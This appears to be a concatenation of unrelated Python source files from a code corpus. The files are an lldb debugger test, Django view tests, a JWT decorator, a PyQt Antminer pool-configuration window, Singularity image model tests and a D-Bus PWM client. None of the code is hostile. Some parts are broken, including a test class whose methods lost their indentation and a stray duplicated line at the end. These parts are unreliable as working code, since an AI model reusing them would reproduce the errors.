        # NOTE(review): sys.settrace does not deliver 'return' events to the
        # global callback, so this branch looks unreachable — the assert would
        # fire if it ever were. Verify before relying on it.
        debug_log (f'return {frame.f_code.co_name}')
        assert False
def init_analyzer(trace_func_names=None, check_tsa=True, show_updates=True, debug=False, backend='pytorch'):
    """Initialize the dynamic shape analyzer and install the tracer.

    Parameters
    ----------
    trace_func_names : list[str] or None
        fnmatch-style patterns of function names to trace; defaults to
        ['main'] when None. (Fix: the default used to be a mutable list
        literal in the signature — replaced with the None-sentinel idiom.)
    check_tsa : bool
        Whether annotated shapes are checked against runtime shapes.
    show_updates : bool
        Whether shape updates are printed as they are recorded.
    debug : bool
        Enables verbose tracer logging.
    backend : str
        Tensor backend passed to the shape cache (e.g. 'pytorch').
    """
    global GLOBALS
    if trace_func_names is None:
        trace_func_names = ['main']
    GLOBALS.debug = debug
    GLOBALS.shape_cache = ShapeCache(debug, backend)
    GLOBALS.trace_into = trace_func_names
    GLOBALS.check_tsa = check_tsa
    GLOBALS.show_updates = show_updates
    GLOBALS.last_exec_line = None
    # Install the call tracer process-wide.
    sys.settrace(trace_calls)
#if __name__ == '__main__':
# main()
| 1.976563 | 2 |
# bindings/python/test/Library/IO/IP.test.py (library-io)
# coding=utf-8
################################################################################################################################################################
# @project Library ▸ I/O
# @file LibraryIOPy/IP.test.py
# @author <NAME> <<EMAIL>>
# @license Apache License 2.0
################################################################################################################################################################
# IP
import Library.Core as Core
import LibraryIOPy as IO
# Convenience aliases into the LibraryIOPy namespace.
URL = IO.URL
Request = IO.IP.TCP.HTTP.Request
Response = IO.IP.TCP.HTTP.Response
Client = IO.IP.TCP.HTTP.Client

# Smoke test: perform a real HTTPS GET (requires network access).
response = Client.Get(URL.Parse("https://www.google.com"))
################################################################################################################################################################
| 1.710938 | 2 |
# view/configureWindow.py (AntminerControll)
from PyQt5.QtWidgets import (QMessageBox, QMainWindow, QLabel, QApplication, QPushButton, QLineEdit, QComboBox)
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import pyqtSignal, Qt
from models.antminer import Antminer
import time
class ConfigureWindow(QMainWindow):
    """Window that applies one pool/worker/password configuration to every
    scanned ASIC of the miner type selected in the combo box.

    ``list_ip`` is expected to be a sequence of ``(ip, miner_type)`` pairs
    produced by the scanner — TODO confirm against the caller.
    """

    # Status signal; currently never emitted (the emit call is commented out).
    got_updates = pyqtSignal(str)

    def __init__(self, parent=None, list_ip=None):
        super(ConfigureWindow, self).__init__(parent)
        self.item_list = list_ip
        self.validation = False  # set True once the form passes validation
        self.move(100, 100)
        self.setWindowTitle('Configure All ASIC')
        self.center()
        # print(list_ip)

        # Status/error label at the top of the form.
        self.err_lbl = QLabel(self)
        self.err_lbl.setGeometry(135, 15, 150, 20)

        self.setWindowIcon(QIcon('./assets/images/icon_tool.png'))

        self.url_lbl = QLabel('<b>Pool URL:</b>', self)
        self.url_lbl.setGeometry(20, 50, 100, 20)
        self.worker_lbl = QLabel('<b>Worker:</b>', self)
        self.worker_lbl.setGeometry(20, 90, 100, 20)
        self.psd_lbl = QLabel('<b>Password:</b>', self)
        self.psd_lbl.setGeometry(20, 130, 100, 20)

        self.url_edt = QLineEdit(self)
        self.url_edt.setPlaceholderText('Input pool: ')
        self.url_edt.setGeometry(100, 50, 220, 20)
        self.worker_edt = QLineEdit(self)
        self.worker_edt.setPlaceholderText('Input workername: ')
        self.worker_edt.setGeometry(100, 90, 220, 20)
        self.psd_edt = QLineEdit(self)
        self.psd_edt.setPlaceholderText('Input key: ')
        self.psd_edt.setGeometry(100, 130, 220, 20)

        self.connect_btn = QPushButton('Configure', self)
        self.connect_btn.setGeometry(150, 185, 100, 30)
        self.connect_btn.setStyleSheet('QPushButton {background-color: #009EDD; color: white;}')
        # Validation runs first, then the actual configuration pass.
        self.connect_btn.clicked.connect(self.prepare_configure)
        self.connect_btn.clicked.connect(self.configure_device)

        # Miner-type selector, populated from the scanned item list.
        self.comboBox = QComboBox(self)
        self.comboBox.setGeometry(320, 20, 120, 20)

        self.setFixedSize(450, 250)
        self.share_combobox()

    def prepare_configure(self):
        """Validate the form and cache pool/worker/password for configure_device."""
        self.pool = self.url_edt.text().strip()
        self.worker = self.worker_edt.text().strip()
        # Bug fix: read the password from the password line edit; the previous
        # source contained a corrupted/undefined reference here.
        self.password = self.psd_edt.text().strip()
        if self.item_list and (self.pool and self.worker and self.password):
            self.err_lbl.setText('<center><b>Start configuring.<br>It may take some minutes:</b></center>')
            self.err_lbl.setStyleSheet('color: black')
            self.connect_btn.setStyleSheet('background-color: #11f93f; color: white')
            self.connect_btn.setText('Wait')
            self.connect_btn.setEnabled(False)
            self.validation = True
            return
        else:
            self.err_lbl.setText('<center><b>Wrong Data</b></center>')
            self.err_lbl.setStyleSheet('color: red')
            self.validation = False
            return

    def configure_device(self):
        """Push the cached configuration to every device of the selected type."""
        if not self.validation:
            return
        self.error_message('Press Ok, to start scanning. It may take a long time')
        curr_type = str(self.comboBox.currentText())
        # Start worker numbering from the trailing digit of the worker name, if
        # any. NOTE(review): a trailing digit stays in the base name AND seeds
        # the counter, so suffixes like "worker12" can result — confirm intent.
        if not self.worker[-1].isnumeric():
            counter = 0
        else:
            counter = int(self.worker[-1])
        for item in self.item_list:
            counter += 1  # NOTE(review): increments even for non-matching types
            if item[1] == curr_type:
                miner = Antminer(item[0])
                result = miner.configure_asic(self.pool, self.worker + str(counter), self.password)
                del miner
        self.err_lbl.setText('<center><b>Complete!</b></center>')
        self.err_lbl.setStyleSheet('color: green')
        # NOTE(review): this immediately clears the "Complete!" message above.
        self.err_lbl.setText('')
        self.connect_btn.setStyleSheet('QPushButton {background-color: #009EDD; color: white;}')
        self.connect_btn.setText('Configure')
        self.connect_btn.setEnabled(True)
        # self.got_updates.emit('1')

    def share_combobox(self):
        """Fill the type combo box with the distinct miner types scanned."""
        if self.item_list:
            buffer = []
            for item in self.item_list:
                if item[1] not in buffer:
                    buffer.append(item[1])
                    self.comboBox.addItem(item[1])

    def error_message(self, message, header='Error'):
        """Show a modal information box with the given message."""
        QMessageBox.information(self, header, str(message))

    def center(self):
        """Center the window on the screen that currently holds the cursor."""
        frameGm = self.frameGeometry()
        screen = QApplication.desktop().screenNumber(QApplication.desktop().cursor().pos())
        centerPoint = QApplication.desktop().screenGeometry(screen).center()
        frameGm.moveCenter(centerPoint)
        self.move(frameGm.topLeft())
# simple_mooc/core/tests/test_views.py (simple-mooc)
from django.test import SimpleTestCase
from django.urls import reverse
class HomePageTests(SimpleTestCase):
    """Smoke tests for the home page view."""

    def test_home_page_status_code(self):
        self.assertEqual(self.client.get('/').status_code, 200)

    def test_view_url_by_name(self):
        url = reverse('core:index')
        self.assertEqual(self.client.get(url).status_code, 200)

    def test_view_uses_correct_template(self):
        resp = self.client.get(reverse('core:index'))
        self.assertEqual(resp.status_code, 200)
        self.assertTemplateUsed(resp, 'home.html')

    def test_view_does_not_contains_404(self):
        resp = self.client.get('/')
        self.assertNotEqual(resp.status_code, 404)
        self.assertNotContains(resp, '<span>(404)</span>')
class ContactPageTests(SimpleTestCase):
    """Smoke tests for the contact page view."""

    def test_contact_page_status_code(self):
        self.assertEqual(self.client.get('/contact').status_code, 200)

    def test_view_url_by_name(self):
        url = reverse('core:contact')
        self.assertEqual(self.client.get(url).status_code, 200)

    def test_view_uses_correct_template(self):
        resp = self.client.get(reverse('core:contact'))
        self.assertEqual(resp.status_code, 200)
        self.assertTemplateUsed(resp, 'contact.html')

    def test_view_does_not_contains_404(self):
        # Note: this test hits '/contact/' (trailing slash) on purpose.
        resp = self.client.get('/contact/')
        self.assertNotEqual(resp.status_code, 404)
        self.assertNotContains(resp, '<span>(404)</span>')
# training_django/middleware.py (Django-Training)
from functools import wraps
from todoproject.jwt import JWTAuth
from todoproject.response import Response
def jwtRequired(fn):
    """View decorator that rejects requests whose Authorization header does
    not decode to a valid JWT; the wrapped view runs only on success."""
    @wraps(fn)
    def guarded(*args, **kwargs):
        request = args[0]
        try:
            decode(request.headers.get('Authorization'))
        except Exception:
            # Any decode failure (missing/malformed/expired token) -> 401.
            return Response.unauthorized()
        return fn(*args, **kwargs)
    return guarded
def decode(token):
    """Decode the JWT from an 'Authorization: Bearer <token>' header value.

    Raises (e.g. IndexError or a JWT error) when the header is missing the
    token part or the token is invalid.
    """
    parts = str(token).split(' ')
    return JWTAuth().decode(parts[1])
# 3.7.0/lldb-3.7.0.src/test/lang/objc/hidden-ivars/TestHiddenIvars.py
"""Test that hidden ivars in a shared library are visible from the main executable."""
import os, time
import unittest2
import lldb
from lldbtest import *
import lldbutil
import subprocess
class HiddenIvarsTestCase(TestBase):
    """Exercises lldb's `expression` and `frame variable` commands on Objective-C
    ivars defined in a shared library, both stripped and unstripped."""

    mydir = TestBase.compute_mydir(__file__)

    @skipUnlessDarwin
    @dsym_test
    def test_expr_with_dsym(self):
        if self.getArchitecture() == 'i386':
            self.skipTest("requires modern objc runtime")
        else:
            self.buildDsym()
            self.expr(False)

    @skipUnlessDarwin
    @dsym_test
    def test_expr_stripped_with_dsym(self):
        if self.getArchitecture() == 'i386':
            self.skipTest("requires modern objc runtime")
        else:
            self.buildDsym()
            self.expr(True)

    @skipUnlessDarwin
    @dwarf_test
    def test_expr_with_dwarf(self):
        if self.getArchitecture() == 'i386':
            self.skipTest("requires modern objc runtime")
        else:
            self.buildDwarf()
            self.expr(False)

    @skipUnlessDarwin
    @dsym_test
    def test_frame_variable_with_dsym(self):
        if self.getArchitecture() == 'i386':
            self.skipTest("requires modern objc runtime")
        else:
            self.buildDsym()
            self.frame_var(False)

    @skipUnlessDarwin
    @dsym_test
    def test_frame_variable_stripped_with_dsym(self):
        if self.getArchitecture() == 'i386':
            self.skipTest("requires modern objc runtime")
        else:
            self.buildDsym()
            self.frame_var(True)

    @skipUnlessDarwin
    @dwarf_test
    def test_frame_variable_with_dwarf(self):
        if self.getArchitecture() == 'i386':
            self.skipTest("requires modern objc runtime")
        else:
            self.buildDwarf()
            self.frame_var(False)

    @unittest2.expectedFailure("rdar://18683637")
    @skipUnlessDarwin
    @dsym_test
    def test_frame_variable_across_modules_with_dsym(self):
        if self.getArchitecture() == 'i386':
            self.skipTest("requires modern objc runtime")
        else:
            self.buildDsym()
            self.frame_var_type_access_across_module()

    @unittest2.expectedFailure("rdar://18683637")
    @skipUnlessDarwin
    @dwarf_test
    def test_frame_variable_across_modules_with_dwarf(self):
        if self.getArchitecture() == 'i386':
            self.skipTest("requires modern objc runtime")
        else:
            self.buildDwarf()
            self.frame_var_type_access_across_module()

    def setUp(self):
        # Call super's setUp().
        TestBase.setUp(self)
        # Find the line number to break inside main().
        self.source = 'main.m'
        self.line = line_number(self.source, '// breakpoint1')
        # The makefile names of the shared libraries as they appear in DYLIB_NAME.
        # The names should have no loading "lib" or extension as they will be localized
        self.shlib_names = ["InternalDefiner"]

    def common_setup(self, strip):
        """Optionally strip the binaries, then launch a.out and stop at the
        breakpoint in main()."""
        if strip:
            self.assertTrue(subprocess.call(['/usr/bin/strip', '-Sx', 'libInternalDefiner.dylib']) == 0, 'stripping dylib succeeded')
            self.assertTrue(subprocess.call(['/bin/rm', '-rf', 'libInternalDefiner.dylib.dSYM']) == 0, 'remove dylib dSYM file succeeded')
            self.assertTrue(subprocess.call(['/usr/bin/strip', '-Sx', 'a.out']) == 0, 'stripping a.out succeeded')
        # Create a target by the debugger.
        target = self.dbg.CreateTarget("a.out")
        self.assertTrue(target, VALID_TARGET)
        # Create the breakpoint inside function 'main'.
        breakpoint = target.BreakpointCreateByLocation(self.source, self.line)
        self.assertTrue(breakpoint, VALID_BREAKPOINT)
        # Register our shared libraries for remote targets so they get automatically uploaded
        environment = self.registerSharedLibrariesWithTarget(target, self.shlib_names)
        # Now launch the process, and do not stop at entry point.
        process = target.LaunchSimple (None, environment, self.get_process_working_directory())
        self.assertTrue(process, PROCESS_IS_VALID)
        exe = os.path.join(os.getcwd(), "a.out")
        self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)
        # Break inside the foo function which takes a bar_ptr argument.
        lldbutil.run_break_set_by_file_and_line (self, "main.m", self.line, num_expected_locations=1, loc_exact=True)
        self.runCmd("run", RUN_SUCCEEDED)
        # The stop reason of the thread should be breakpoint.
        self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
                    substrs = ['stopped',
                               'stop reason = breakpoint'])
        # The breakpoint should have a hit count of 1.
        self.expect("breakpoint list -f", BREAKPOINT_HIT_ONCE,
                    substrs = [' resolved, hit count = 1'])

    def expr(self, strip):
        """Check hidden-ivar visibility through the `expression` command."""
        self.common_setup(strip)
        # This should display correctly.
        self.expect("expression (j->_definer->foo)", VARIABLES_DISPLAYED_CORRECTLY,
                    substrs = ["= 4"])
        self.expect("expression (j->_definer->bar)", VARIABLES_DISPLAYED_CORRECTLY,
                    substrs = ["= 5"])
        if strip:
            # With stripped symbols the hidden 'bar' ivar is not expected.
            self.expect("expression *(j->_definer)", VARIABLES_DISPLAYED_CORRECTLY,
                        substrs = ["foo = 4"])
        else:
            self.expect("expression *(j->_definer)", VARIABLES_DISPLAYED_CORRECTLY,
                        substrs = ["foo = 4", "bar = 5"])
        self.expect("expression (k->foo)", VARIABLES_DISPLAYED_CORRECTLY,
                    substrs = ["= 2"])
        self.expect("expression (k->bar)", VARIABLES_DISPLAYED_CORRECTLY,
                    substrs = ["= 3"])
        self.expect("expression k.filteredDataSource", VARIABLES_DISPLAYED_CORRECTLY,
                    substrs = [' = 0x', '"2 objects"'])
        if strip:
            self.expect("expression *(k)", VARIABLES_DISPLAYED_CORRECTLY,
                        substrs = ["foo = 2", ' = 0x', '"2 objects"'])
        else:
            self.expect("expression *(k)", VARIABLES_DISPLAYED_CORRECTLY,
                        substrs = ["foo = 2", "bar = 3", '_filteredDataSource = 0x', '"2 objects"'])

    def frame_var(self, strip):
        """Check hidden-ivar visibility through the `frame variable` command."""
        self.common_setup(strip)
        # This should display correctly.
        self.expect("frame variable j->_definer->foo", VARIABLES_DISPLAYED_CORRECTLY,
                    substrs = ["= 4"])
        if not strip:
            self.expect("frame variable j->_definer->bar", VARIABLES_DISPLAYED_CORRECTLY,
                        substrs = ["= 5"])
        if strip:
            self.expect("frame variable *j->_definer", VARIABLES_DISPLAYED_CORRECTLY,
                        substrs = ["foo = 4"])
        else:
            self.expect("frame variable *j->_definer", VARIABLES_DISPLAYED_CORRECTLY,
                        substrs = ["foo = 4", "bar = 5"])
        self.expect("frame variable k->foo", VARIABLES_DISPLAYED_CORRECTLY,
                    substrs = ["= 2"])
        self.expect("frame variable k->_filteredDataSource", VARIABLES_DISPLAYED_CORRECTLY,
                    substrs = [' = 0x', '"2 objects"'])
        if strip:
            self.expect("frame variable *k", VARIABLES_DISPLAYED_CORRECTLY,
                        substrs = ["foo = 2", '_filteredDataSource = 0x', '"2 objects"'])
        else:
            self.expect("frame variable *k", VARIABLES_DISPLAYED_CORRECTLY,
                        substrs = ["foo = 2", "bar = 3", '_filteredDataSource = 0x', '"2 objects"'])

    def frame_var_type_access_across_module(self):
        """Access an ivar declared in another module via `frame variable`."""
        self.common_setup(False)
        self.expect("frame variable k->bar", VARIABLES_DISPLAYED_CORRECTLY, substrs = ["= 3"])
if __name__ == '__main__':
    # Standalone entry point: initialize lldb, make sure it is terminated on
    # interpreter exit, then run the unittest2 test runner.
    import atexit
    lldb.SBDebugger.Initialize()
    atexit.register(lambda: lldb.SBDebugger.Terminate())
    unittest2.main()
| 2.25 | 2 |
# features/tensor_parallel/configs/tp_2d.py
# Colossal-AI parallelism configuration: no data/pipeline parallelism,
# tensor parallelism of size 4 using the 2D mode.
parallel = dict(
    data=1,
    pipeline=1,
    tensor=dict(size=4, mode='2d'),
)
# backend/Hinkskalle/tests/models/test_Image.py (hinkskalle)
from typing import Tuple
import unittest
from unittest import mock
from datetime import datetime, timedelta
import os.path
from shutil import which, rmtree
import subprocess
from Hinkskalle.models.Entity import Entity
from Hinkskalle.models.Collection import Collection
from Hinkskalle.models.Container import Container
from Hinkskalle.models.Image import Image, ImageSchema
from Hinkskalle.models.Tag import Tag
from Hinkskalle.tests.models.test_Collection import _create_collection
from Hinkskalle import db
from ..model_base import ModelBase
from .._util import _create_user, _create_image
class TestImage(ModelBase):
def test_image(self):
    # Creating an Image inside a full entity/collection/container hierarchy
    # exposes the parent ids and names via the convenience accessors.
    entity = Entity(name='test-hase')
    db.session.add(entity)
    db.session.commit()
    coll = Collection(name='test-collection', entity_ref=entity)
    db.session.add(coll)
    db.session.commit()
    container = Container(name='test-container', collection_ref=coll)
    db.session.add(container)
    db.session.commit()
    image = Image(description='test-image', container_ref=container)
    db.session.add(image)
    db.session.commit()

    read_image = Image.query.get(image.id)
    # createdAt should be "now" within a one-second tolerance.
    self.assertTrue(abs(read_image.createdAt - datetime.now()) < timedelta(seconds=1))
    self.assertEqual(read_image.container(), container.id)
    self.assertEqual(read_image.containerName(), container.name)
    self.assertEqual(read_image.collection(), coll.id)
    self.assertEqual(read_image.collectionName(), coll.name)
    self.assertEqual(read_image.entity(), entity.id)
    self.assertEqual(read_image.entityName(), entity.name)
def test_manifest(self):
    # The generated OCI-style manifest for a SIF image embeds the image's
    # digest, container title and size.
    image = _create_image(media_type='application/vnd.sylabs.sif.layer.v1.sif')[0]
    image.size = 666
    manifest = image.generate_manifest()
    self.assertRegex(manifest.content, r'"schemaVersion": 2')
    self.assertRegex(manifest.content, rf'"digest": "sha256:{image.hash.replace("sha256.", "")}"')
    self.assertRegex(manifest.content, rf'"org.opencontainers.image.title": "{image.container_ref.name}"')
    self.assertRegex(manifest.content, rf'"size": {image.size}')
def test_manifest_mediatype(self):
    # Manifest generation must reject non-SIF media types.
    image = _create_image(media_type='application/vnd.docker.image.rootfs.diff.tar.gzip')[0]
    image.size = 666
    db.session.commit()
    with self.assertRaises(Exception):
        image.generate_manifest()
def test_tags(self):
    # Image.tags() returns the names of all attached tags, in order.
    image = _create_image()[0]
    tag1 = Tag(name='v1', image_ref=image)
    db.session.add(tag1)
    db.session.commit()
    tag2 = Tag(name='v2', image_ref=image)
    db.session.add(tag2)
    db.session.commit()
    self.assertListEqual(image.tags(), ['v1', 'v2'])
    # NOTE(review): Tag.__table__.delete() only *builds* a Delete statement
    # and never executes it, so nothing is actually cleaned up — verify.
    Tag.__table__.delete()
def test_tags_case(self):
    # Tag names are reported lower-cased by Image.tags().
    image = _create_image()[0]
    tag1 = Tag(name='TestHase', image_ref=image)
    db.session.add(tag1)
    db.session.commit()
    self.assertListEqual(image.tags(), ['testhase'])
def test_access(self):
    # Public images are readable by admins, regular users and anonymous.
    admin = _create_user(name='admin.oink', is_admin=True)
    user = _create_user(name='user.oink', is_admin=False)
    image = _create_image()[0]
    self.assertTrue(image.check_access(admin))
    self.assertTrue(image.check_access(user))
    self.assertTrue(image.check_access(None))
def test_access_private(self):
    # Private images are readable only by admins and the container's owner.
    admin = _create_user(name='admin.oink', is_admin=True)
    user = _create_user(name='user.oink', is_admin=False)
    image, container, _, _ = _create_image()
    container.private = True
    self.assertFalse(image.check_access(None))
    self.assertTrue(image.check_access(admin))
    self.assertFalse(image.check_access(user))

    container.owner = user
    self.assertTrue(image.check_access(user))
def test_update_access(self):
    # Only admins and the container owner may update an image.
    admin = _create_user(name='admin.oink', is_admin=True)
    user = _create_user(name='user.oink', is_admin=False)
    image, container, _, _ = _create_image()
    self.assertTrue(image.check_update_access(admin))
    self.assertFalse(image.check_update_access(user))

    container.owner = user
    self.assertTrue(image.check_update_access(user))
def test_schema(self):
    # Serializing an image exposes the ids and names of its container /
    # collection / entity hierarchy. Uses the marshmallow-2 style result
    # object with .data/.errors (presumably — confirm library version).
    schema = ImageSchema()
    image = _create_image()[0]
    serialized = schema.dump(image)
    self.assertEqual(serialized.data['hash'], image.hash)

    entity = Entity(name='Test Hase')
    db.session.add(entity)
    db.session.commit()
    coll = Collection(name='Test Collection', entity_ref=entity)
    db.session.add(coll)
    db.session.commit()
    container = Container(name='Test Container', collection_ref=coll)
    db.session.add(container)
    db.session.commit()
    # Re-parent the image onto the new container.
    image.container_id = container.id
    db.session.commit()

    serialized = schema.dump(image)
    self.assertDictEqual(serialized.errors, {})
    self.assertEqual(serialized.data['container'], str(container.id))
    self.assertEqual(serialized.data['containerName'], container.name)
    self.assertEqual(serialized.data['collection'], str(coll.id))
    self.assertEqual(serialized.data['collectionName'], coll.name)
    self.assertEqual(serialized.data['entity'], str(entity.id))
    self.assertEqual(serialized.data['entityName'], entity.name)
    self.assertIsNone(serialized.data['deletedAt'])
    self.assertFalse(serialized.data['deleted'])
def test_schema_tags(self):
    """A serialized image exposes its tag names in creation order."""
    schema = ImageSchema()
    image = _create_image()[0]
    tag1 = Tag(name='v1', image_ref=image)
    db.session.add(tag1)
    db.session.commit()
    tag2 = Tag(name='v2', image_ref=image)
    db.session.add(tag2)
    db.session.commit()
    serialized = schema.dump(image)
    self.assertDictEqual(serialized.errors, {})
    self.assertListEqual(serialized.data['tags'], ['v1', 'v2'])
    # BUG FIX: the original called Tag.__table__.delete(), which only *builds*
    # a DELETE statement and never executes it, so the tags leaked into later
    # tests. Actually execute the cleanup.
    db.session.execute(Tag.__table__.delete())
    db.session.commit()
def _get_test_path(self, name):
    """Return the path of test fixture *name* in the ``share/`` directory next to the test package."""
    return os.path.join(os.path.dirname(__file__), "../share/", name)
@unittest.skipIf(which("singularity") is None, "singularity not installed")
def test_inspect(self):
    """inspect() returns the deffile recorded inside an uploaded SIF image."""
    image = _create_image()[0]
    image.location = self._get_test_path("busybox.sif")
    image.uploaded = True
    db.session.commit()
    deffile = image.inspect()
    self.assertEqual(deffile, 'bootstrap: docker\nfrom: busybox\n\n')
def test_check_file_file_not_found(self):
    """_check_file() raises when the stored location does not exist on disk."""
    image = _create_image()[0]
    # Deliberately point at a fixture file that does not exist.
    image.location = self._get_test_path("migibtsnet.sif")
    image.uploaded = True
    db.session.commit()
    with self.assertRaisesRegex(Exception, r"Image file.*does not exist"):
        image._check_file()
def test_check_file_not_uploaded(self):
    """_check_file() raises while the image upload has not completed."""
    image = _create_image()[0]
    image.uploaded = False
    db.session.commit()
    with self.assertRaisesRegex(Exception, r"Image is not uploaded yet"):
        image._check_file()
@unittest.skipIf(which("singularity") is None, "singularity not installed")
def test_signed(self):
    """A signed SIF without a reachable keyserver reports one signature with an unknown signer."""
    # Point the keyserver at a dead host so the key lookup cannot succeed.
    self.app.config['KEYSERVER_URL']='http://nonexistent/'
    image = _create_image()[0]
    image.location = self._get_test_path("busybox_signed.sif")
    image.uploaded = True
    db.session.commit()
    sigdata = image.check_signature()
    self.assertEqual(sigdata['Signatures'], 1)
    self.assertIsNone(sigdata['SignerKeys'])
    self.assertEqual(sigdata['Reason'], 'Unknown')
@unittest.skipIf(which("singularity") is None, "singularity not installed")
def test_signature_fail(self):
    """check_signature() raises for files that are not valid SIF images."""
    self.app.config['KEYSERVER_URL']='http://nonexistent/'
    image = _create_image()[0]
    # just something that is not a SIF
    image.location = __file__
    image.uploaded = True
    db.session.commit()
    with self.assertRaisesRegex(Exception, r'invalid SIF file'):
        image.check_signature()
@unittest.skipIf(which("singularity") is None, "singularity not installed")
def test_signature_unsigned(self):
    """An unsigned SIF reports zero signatures and reason 'Unsigned'."""
    self.app.config['KEYSERVER_URL']='http://nonexistent/'
    image = _create_image()[0]
    image.location = self._get_test_path("busybox.sif")
    image.uploaded = True
    db.session.commit()
    sigdata = image.check_signature()
    self.assertEqual(sigdata['Signatures'], 0)
    self.assertIsNone(sigdata['SignerKeys'])
    self.assertEqual(sigdata['Reason'], 'Unsigned')
@unittest.skipIf(which("singularity") is None, "singularity not installed")
def test_signed_pubkey(self):
    """With the signer's public key imported, verification reports a matching signer."""
    self.app.config['KEYSERVER_URL']='http://nonexistent/'
    imp = subprocess.run(["singularity", "keys", "import", self._get_test_path("testhase-pub.asc")], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    if imp.returncode != 0:
        raise Exception(f"Test key import error: {imp.stderr}")
    image = _create_image()[0]
    image.location = self._get_test_path("busybox_signed.sif")
    image.uploaded = True
    db.session.commit()
    sigdata = image.check_signature()
    self.assertEqual(sigdata['Signatures'], 1)
    # assertDictContainsSubset() is deprecated since Python 3.2 and removed in
    # 3.12; check the expected subset of the signer dict explicitly instead.
    signer = sigdata['SignerKeys'][0]['Signer']
    self.assertEqual(signer.get('Partition'), 'Def.FILE')
    self.assertEqual(signer.get('DataCheck'), True)
    # Remove the imported key so later tests start from a clean keyring.
    rmtree(os.path.expanduser("~/.singularity/sypgp"))
def test_signed_mock(self):
    """check_signature() parses the verify output and flags the image as signed and verified."""
    image = _create_image(media_type=Image.singularity_media_type)[0]
    image.location = self._get_test_path("busybox_signed.sif")
    image.uploaded = True
    db.session.commit()
    # Mock the singularity subprocess so the test runs without the binary installed.
    with mock.patch('subprocess.run') as mock_sig:
        mock_sig.return_value = mock.Mock(returncode=0, stdout='{ "Passed": true, "Signatures": 1 }')
        sigdata = image.check_signature()
        mock_sig.assert_called()
        self.assertTrue(image.signed)
        self.assertTrue(image.signatureVerified)
def test_skip_signature_non_singularity(self):
    """Signature checking is skipped entirely for non-Singularity media types."""
    image = _create_image(media_type='oink')[0]
    image.location = self._get_test_path("busybox_signed.sif")
    image.uploaded = True
    db.session.commit()
    with mock.patch('subprocess.run') as mock_sig:
        sigdata = image.check_signature()
        # The singularity binary must never be invoked for foreign media types.
        mock_sig.assert_not_called()
        self.assertDictEqual(sigdata, {'Passed': False, 'Reason': 'NotApplicable'})
def test_media_type(self):
    """Images are hidden unless their media type is the Singularity SIF layer type."""
    image = _create_image()[0]
    self.assertFalse(image.hide)
    image.media_type='testhase'
    self.assertTrue(image.hide)
    image.media_type='application/vnd.sylabs.sif.layer.v1.sif'
    self.assertFalse(image.hide)
    # Assigning media_type overrides a manually set hide flag — hide appears
    # to be derived from media_type (behavior asserted below).
    image.hide = True
    image.media_type = None
    self.assertFalse(image.hide)
def test_make_filename(self):
    """Singularity images get a ``.sif`` suffix; other media types use the bare hash."""
    image = _create_image()[0]
    fn = image.make_filename()
    # assertEquals is a deprecated alias of assertEqual (removed in Python 3.12).
    self.assertEqual(fn, f"{image.hash}.sif")
    image.media_type='grunz'
    fn = image.make_filename()
    self.assertEqual(fn, f"{image.hash}")
def test_make_prettyname(self):
    """Pretty names are entity/collection/container_tag, with .sif only for SIF images."""
    image = _create_image()[0]
    fn = image.make_prettyname('v1')
    # assertEquals is a deprecated alias of assertEqual (removed in Python 3.12).
    self.assertEqual(fn, f"{image.entityName()}/{image.collectionName()}/{image.containerName()}_v1.sif")
    image.media_type='grunz'
    fn = image.make_prettyname('v1')
    self.assertEqual(fn, f"{image.entityName()}/{image.collectionName()}/{image.containerName()}_v1")
self.assertEquals(fn, f"{image.entityName()}/{image.collectionName()}/{image.containerName()}_v1") | 2.1875 | 2 |
piio/_piio_pwm.py | daniel-blake/piio-client | 0 | 12760320 | <filename>piio/_piio_pwm.py
import gobject
import dbus
import dbus.service
import dbus.mainloop.glib
from _event import Event
from _dbus_smartobject import DBusSmartObject,NoConnectionError
from _piio import PiIo, PiIoGroup, PiIoDict
class PiIoGroupPwm (PiIoGroup):
    '''
    Access piio PWM IO groups over D-Bus.

    Attributes:
        PwmValueChanged: Event(handle, value) - fires when a PWM value changed.
        pwms: PiIoDict mapping short handle -> PwmOutput.

    Note that the handle provided on these events is the short handle relative
    to this IO Group.

    NOTE: this module is written for Python 2 (print statements, dict.has_key).
    '''
    def __init__(self,path):
        '''
        Initialize the object for a PWM IO Group connection at D-Bus *path*.
        '''
        self._dbus_itf_iogroup_pwm='nl.miqra.PiIo.IoGroup.Pwm'
        # declare events
        self.PwmValueChanged = Event() # arguments: handle, value
        self.pwms = PiIoDict()
        # Base class connects to the bus and will call _init_busobject().
        PiIoGroup.__init__(self,path)

    def _init_busobject(self,busobject):
        '''Hook called (also on reconnect) once the D-Bus proxy is available.'''
        PiIoGroup._init_busobject(self,busobject)
        # connect_to_signal registers our callback function.
        busobject.connect_to_signal('PwmValueChanged', self._pwmValueChanged)
        # register pwms
        # catch an exception that occurs if we're not connected
        try:
            # add pwms if they were not already registered (in case of reconnect)
            for handle in self._pwmHandles():
                handle = str(handle)
                if not self.pwms.has_key(handle):
                    o = PwmOutput(self, handle)
                    self.pwms[handle] = o
        except NoConnectionError as x:
            print "Error: Lost connection to piio-server during initialization"

    def _pwmValueChanged(self,handle, value):
        """Called by D-Bus when a PWM pin has its value changed; fans out to listeners.

        NOTE(review): the per-output trigger passes the literal string
        'PwmValueChanged' instead of the new value -- looks unintended; confirm
        against PwmOutput.OnChanged consumers.
        """
        self.pwms[handle]._trigger("PwmValueChanged");
        self.PwmValueChanged(handle, value)

    def _pwmHandles(self):
        # Ask the server for the list of PWM handles in this group.
        return self._call("Pwms",interface=self._dbus_itf_iogroup_pwm)
# Register this implementation with the PiIo factory so D-Bus objects exposing
# the Pwm IoGroup interface are instantiated as PiIoGroupPwm.
PiIo.RegisterClass('nl.miqra.PiIo.IoGroup.Pwm', PiIoGroupPwm)
class PwmOutput(object):
    '''
    Client-side handle for a single PWM output inside a PiIoGroupPwm.

    All reads/writes are forwarded to the owning IO group over D-Bus using the
    Pwm interface; ``OnChanged`` fires when the server reports a new value for
    this output.
    '''
    def __init__(self,iogroup,handle):
        self._iogroup = iogroup   # owning PiIoGroupPwm (wraps the D-Bus proxy)
        self._handle = handle     # short handle of this PWM within the group
        self.OnChanged = Event(); # subscribers receive the new value (or None)

    def Name(self):
        '''
        Fully qualified name of this IO: "<group name>.<handle>".
        '''
        # BUG FIX: the original referenced the non-existent attribute
        # ``self.handle`` (the property is ``Handle``), which raised
        # AttributeError on every call.
        return self._iogroup.Name() + "." + self.Handle

